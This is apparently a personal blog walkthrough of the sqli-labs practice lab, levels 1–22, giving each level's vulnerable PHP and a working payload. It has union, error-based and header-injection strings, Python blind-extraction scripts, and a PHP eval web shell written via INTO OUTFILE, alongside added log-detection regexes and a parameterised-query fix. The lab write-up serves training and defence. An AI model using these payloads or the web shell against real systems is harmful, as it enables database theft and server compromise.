sqli-labs speedrun walkthrough

Preface

The blogger's true nature: daily updates (×), daily slacking (✓)

Currently recorded up to Less-22 :-)

Creeper?

Awww man.

Less-1

Source:

```php
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
```

payload:

```
?id=-1' union select 1,2,database() --+
```

Less-2

Source:

```php
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
```

payload:

```
?id=-1 union select 1,2,user() --+
```

Less-3

Source:

```php
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
```

payload:

```
?id=-1') union select 1,2,user() --+
```

Less-4

Source:

```php
$id = '"' . $id . '"';  // wrapped in double quotes, so a single quote is not interpreted
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
```

payload:

```
?id=-1") union select 1,2,database() --+
```

Less-5

Topics: boolean-based blind injection, error-based injection

Source:

```php
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........'; // the query result is not returned
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="3" color="#FFFF00">';
    print_r(mysql_error()); // prints the error
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}
```

payload1:

```python
# -*- coding: utf-8 -*-
import requests

s = requests.session()
character = "abcdefghijklmnopqrstuvwxyz"
length = 32
flag = ""

# Boolean-based blind: guess the database name one character at a time,
# using the "You are in" marker in the response as the true/false oracle.
for i in range(1, length):
    for c in character:
        url = "http://127.0.0.1/sqli-labs/Less-5/?id=1' and ascii(substr((select database()),%d,1)) = %d --+" \
            % (i, ord(c))
        r = s.get(url).text
        if "You are in" in r:
            flag += c
            print(flag)
            break
```

payload2:

```
?id=1' and updatexml(1,concat('~',(your_payload),'~'),3) --+

?id=1' and extractvalue(1,concat(0x7e,(your_payload),0x7e)) --+

?id=1' and exp(~(select * from (your_payload) a) ); --+

?id=1' and (select 1 from (select count(*),concat(((your_payload)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
```

Less-6

The single quote becomes a double quote; just adjust the Less-5 payload accordingly.

Less-7

Topic: SQL file operations

Source:

```php
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
echo '<br>'.$sql.'<br>';
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font color= "#FFFF00">';
    echo 'You are in.... Use outfile......';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font color= "#FFFF00">';
    echo 'You have an error in your SQL syntax';
    //print_r(mysql_error());
    echo "</font>";
}
```

The hint tells us to use outfile, so we can write a shell with it.

payload:

```
?id=1')) union select 1,2,'<script language='php'>@eval($_POST['sketch_pl4ne'])</script>' into outfile 'C:\\xxx\\xxx\\xxx\\output.php' --+
```

The path must be absolute.

Connect with AntSword:

Less-8

Topic: boolean-based blind injection

Source:

```php
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="5" color="#FFFF00">';
    //echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}
```

PS: read the code carefully. No error message is output here, so only blind injection works.

payload:

```python
# -*- coding: utf-8 -*-
import requests

s = requests.session()
character = "abcdefghijklmnopqrstuvwxyz"
length = 32
flag = ""

# Same boolean-based blind loop as Less-5; only the target URL changes.
for i in range(1, length):
    for c in character:
        url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),%d,1)) = %d --+" \
            % (i, ord(c))
        r = s.get(url).text
        if "You are in" in r:
            flag += c
            print(flag)
            break
```

Less-9

Topic: time-based blind injection

Source:

```php
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}
```

Both branches output You are in..........., so the returned page gives no way to tell whether the statement succeeded.

So here we use time-based blind injection.

payload:

```python
# -*- coding: utf-8 -*-
import requests
import string

character = string.digits + string.ascii_letters + string.punctuation
flag_length = 40
flag = ""

s = requests.session()
# Time-based blind: a correct guess makes the server sleep(5), which shows up
# client-side as a read timeout because timeout=4 is shorter than the sleep.
for i in range(1, flag_length):
    for c in character:
        url = "http://127.0.0.1/sqli-labs/Less-9/?id=1' and if((ascii(substr((select database()),%d,1)))=%d,sleep(5),0) --+" % (i, ord(c))
        try:
            s.get(url, timeout=4)
        except requests.exceptions.ReadTimeout:
            flag += c
            print(flag)
            break  # stop guessing this position once a character is confirmed
```
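From the defender's side, the scripts for Less-5, Less-8 and Less-9 leave a very regular trace: one request per candidate character, all from one client, each carrying `ascii(substr(` or `if(...,sleep(n),0)`. The analyser below is an added example, not part of the original post: it URL-decodes request paths from constructed access-log lines, matches those signatures, and reports clients that exceed a probe threshold (the log format, signatures and threshold are assumptions).

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Request-path signatures for the primitives the Less-5/8/9 scripts use.
# Order matters: the time-blind probe also contains ascii(substr(...)).
SIGNATURES = [
    ("time-blind", re.compile(r"\bif\s*\(.*sleep\s*\(\s*\d+", re.I)),
    ("boolean-blind", re.compile(r"ascii\s*\(\s*substr\s*\(", re.I)),
    ("error-based", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
]

# Assumed common log format: ip ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def classify_path(path):
    """URL-decode the request path and return the first matching signature name, else None."""
    decoded = unquote_plus(path)
    for name, pattern in SIGNATURES:
        if pattern.search(decoded):
            return name
    return None

def find_probing(lines, threshold=3):
    """Return {ip: {signature: count}} for IPs with at least `threshold` flagged requests."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, _status = m.groups()
        kind = classify_path(path)
        if kind:
            hits[ip][kind] += 1
    return {ip: dict(kinds) for ip, kinds in hits.items() if sum(kinds.values()) >= threshold}

# Constructed sample log (not real traffic): four probes from 10.0.0.5 in the shape
# the scripts above emit, and one ordinary request from 10.0.0.9.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /sqli-labs/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),1,1))%20=%20115%20--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /sqli-labs/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),1,1))%20=%20116%20--+ HTTP/1.1" 200 480',
    '10.0.0.5 - - [01/Jan/2020:10:00:02 +0000] "GET /sqli-labs/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),2,1))%20=%20101%20--+ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2020:10:00:08 +0000] "GET /sqli-labs/Less-9/?id=1%27%20and%20if((ascii(substr((select%20database()),1,1)))=115,sleep(5),0)%20--+ HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2020:10:00:09 +0000] "GET /sqli-labs/Less-8/?id=1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(find_probing(SAMPLE_LOG))
```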

Less-10

Source:

```php
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}
```

payload:

The single quote changes to a double quote; refer to the previous level's payload = =

Less-11

Topic: POST injection

For now there is no big difference from GET; the distinction will matter later when wide-byte injection is covered.

Source:

```php
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';

        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';

        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
```

payload:

```
uname=admin' or 1 #
&passwd=everything
&submit=Submit
```

Less-12

Source:

```php
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
```

payload:

Add double quotes to the Less-11 parameters; see the previous level.

Less-13

Topic: boolean-based blind injection

Source:

```php
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
    //echo '<font color= "#0000ff">';

    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    //echo 'Your Login name:'. $row['username'];
    //echo "<br>";
    //echo 'Your Password:' .$row['password'];
    //echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';

    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
```

There is no echoed data, but an image indicates success or failure, so consider boolean-based blind injection.

payload:

Write the script along the lines of Less-8; the key is to find where the responses differ, and of course the injection point.

Less-14

Source:

```php
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
```

payload:

Write the script along the lines of Less-8.

Less-15

Source:

```php
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

// connectivity
// @$sql: the @ suppresses error messages
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
```

payload:

Same thing in a different wrapper; either boolean-based or time-based blind injection works.

Less-16

Source:

```php
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];

// connectivity
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
```

payload:

Still the same thing in a different wrapper, but it reminds us to watch for the forms the parameter may take: '$id', "$id", ($id), ("$id"), ('$id'), (($id)) and so on.

Less-17

Topic: injection into an UPDATE statement

Source:

```php
// fairly harsh filtering
function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }

    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }

    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}


if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']);

    $passwd=$_POST['passwd'];

    // connectivity
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        //echo '<font color= "#0000ff">';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        ......;
    }
```

payload:

```
uname=sketch_pl4ne
&passwd=passwd'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) #
&submit=Submit
```

Try the other error-based injection statements yourself.
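To see why Less-17 is still exploitable even though `uname` is filtered, here is an added example (not from the original post or the sqli-labs source) that ports `check_input()` to Python and replays the two-query flow against an in-memory sqlite3 table; the schema, the row values and the function names are assumptions. The vulnerable variant breaks as soon as the password contains a single quote, while the parameterised variant stores it verbatim:

```python
import sqlite3

def check_input(value):
    """Python port of the lab's check_input(): truncate to 15 chars, then
    either cast to an integer or quote it with single quotes doubled."""
    value = value[:15]
    if value.isdigit():
        return str(int(value))
    return "'" + value.replace("'", "''") + "'"

def setup():
    """Fresh in-memory users table (schema and rows are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'secret'), ('bob', 'hunter2')")
    return conn

def reset_password_vulnerable(conn, uname, passwd):
    """Mirrors Less-17: uname goes through check_input, passwd is concatenated raw."""
    row = conn.execute("SELECT username FROM users WHERE username=%s LIMIT 1"
                       % check_input(uname)).fetchone()
    if row:
        # Same shape as the PHP $update string: passwd lands unescaped in the SQL text.
        conn.execute("UPDATE users SET password = '%s' WHERE username='%s'" % (passwd, row[0]))
    return row is not None

def reset_password_safe(conn, uname, passwd):
    """Fixed version: both statements take bound parameters, no string building."""
    row = conn.execute("SELECT username FROM users WHERE username=? LIMIT 1", (uname,)).fetchone()
    if row:
        conn.execute("UPDATE users SET password = ? WHERE username=?", (passwd, row[0]))
    return row is not None

def password_of(conn, uname):
    return conn.execute("SELECT password FROM users WHERE username=?", (uname,)).fetchone()[0]

def demo(passwd="o'brien"):
    """Run both variants on a fresh table with a password containing a quote.
    Returns (vulnerable_variant_failed, value_stored_by_safe_variant)."""
    conn = setup()
    try:
        reset_password_vulnerable(conn, "bob", passwd)
        vuln_failed = False
    except sqlite3.OperationalError:   # the quote breaks the hand-built UPDATE
        vuln_failed = True
    conn = setup()
    reset_password_safe(conn, "bob", passwd)
    return vuln_failed, password_of(conn, "bob")
```

Calling `demo()` returns `(True, "o'brien")`: the filtered lookup succeeded, but the second query is where the unescaped value lands.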

Less-18

Topic: HTTP header injection – User-Agent

Source:

```php
$uagent = $_SERVER['HTTP_USER_AGENT'];
$IP = $_SERVER['REMOTE_ADDR'];

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";

echo 'Your User Agent is: ' .$uagent;
```

payload:

Intercept the request and modify the User-Agent:

```
' and updatexml(1,concat('~',(database()),'~'),3) and '1'='1
```

Less-19

Topic: HTTP header injection – Referer

Source:

```php
$uagent = $_SERVER['HTTP_REFERER'];
// the rest is the same as Less-18
```

payload:

Intercept the request and modify the Referer:

```
' and updatexml(1,concat('~',(database()),'~'),3) and '1'='1
```

Less-20

Topic: HTTP header injection – Cookie

Source:

```php
$cookee = $_COOKIE['uname'];
.......
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
```

payload:

Intercept the request and modify Cookie['uname']:

```
admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) #
```

Less-21

Topic: HTTP header injection – Cookie, base64 encoding

Source:

```php
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
......
// the value is wrapped in parentheses here, which is why the payload below closes with ')
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
```

payload:

Intercept the request and modify Cookie['uname']:

```
YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM=
```

Less-22

Source:

```php
$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
.....
// the double-quoted $cookee1 is what reaches the query, hence the " in the payload below
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
```

payload:

Intercept the request and modify Cookie['uname']:

```
c2tldGNoX3BsNG5lImFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM=
```
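Less-21 and Less-22 show why a filter or log rule that only inspects the raw Cookie header misses the injection: the SQL only appears after base64 decoding. This added example (not from the original post) decodes the two cookie values from the payloads above and runs a signature check on both the raw and the decoded form; the regex and the function names are assumptions.

```python
import base64
import binascii
import re

# Assumed signature for the error-based primitive used in the Less-20..22 payloads.
ERROR_BASED = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)

def decode_if_base64(value):
    """Return the decoded text if `value` is strict base64 that decodes to
    printable UTF-8; otherwise return `value` unchanged."""
    try:
        raw = base64.b64decode(value, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return value
    return text if text.isprintable() else value

def is_suspicious(value):
    """Signature check on the raw header value and on its decoded form."""
    return bool(ERROR_BASED.search(value) or ERROR_BASED.search(decode_if_base64(value)))

# The two cookie values from the Less-21 and Less-22 payloads above.
LESS21_COOKIE = "YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpKSM="
LESS22_COOKIE = "c2tldGNoX3BsNG5lImFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM="

if __name__ == "__main__":
    for c in (LESS21_COOKIE, LESS22_COOKIE, "admin"):
        print(repr(decode_if_base64(c)), is_suspicious(c))
```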

Summary

Haven't written the English essay yet, wsl...

Haven't written the PPT yet, wsl...

I feel 💊

Even though tomorrow is a full day of classes (plus two English essays, awsl), I'll still try to get it written.
